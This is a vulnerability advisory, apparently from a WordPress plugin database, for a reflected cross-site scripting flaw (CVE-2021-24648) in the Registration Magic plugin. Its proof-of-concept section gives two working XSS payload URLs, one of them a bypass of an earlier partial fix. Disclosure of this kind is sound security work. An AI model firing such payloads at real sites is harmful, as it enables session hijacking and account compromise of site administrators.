Registration Magic < 5.0.1.9 – Reflected Cross-Site Scripting | CVE 2021-24648 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the rm_search_value parameter before outputting back in an attribute, leading to a Reflected Cross-Site Scripting

Proof of Concept

v < 5.0.1.2
https://example.com/wp-admin/admin.php?page=rm_login_advanced&rm_search_value="><script>alert(/XSS/)</script>

v < 5.0.1.9
https://example.com/wp-admin/admin.php?page=rm_login_advanced&rm_search_value="%20style=animation-name:rotation%20onanimationstart=alert(/XSS/)//

Affects Plugins

custom-registration-form-builder-with-submission-manager

Fixed in 5.0.1.9

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2646734

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

AyeCode Ltd

Submitter

Stiofan

Submitter website

https://ayecode.io/

Submitter twitter

Verified

Yes

WPVDB ID

a3573212-2a98-4504-b8f4-b4d46655e17c

Timeline

Publicly Published

2021-12-28 (about 4 years ago)

Added

2021-12-28 (about 4 years ago)

Last Updated

2022-04-13 (about 3 years ago)

Other

Published

Title

Published

2025-04-28

Title

Ninja Forms < 3.10.1 - Admin+ Stored XSS

Published

2023-10-18

Title

WhatsApp Share Button <= 1.0.1 - Contributor+ Stored XSS

Published

2025-10-16

Title

tagDiv Composer < 5.4.2 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-12-14

Title

hmd < 2.2 - Reflected Cross-Site Scripting

Published

2024-10-30

Title

ID-SK Toolkit <= 1.7.2 - Authenticated (Contributor+) Stored Cross-Site Scripting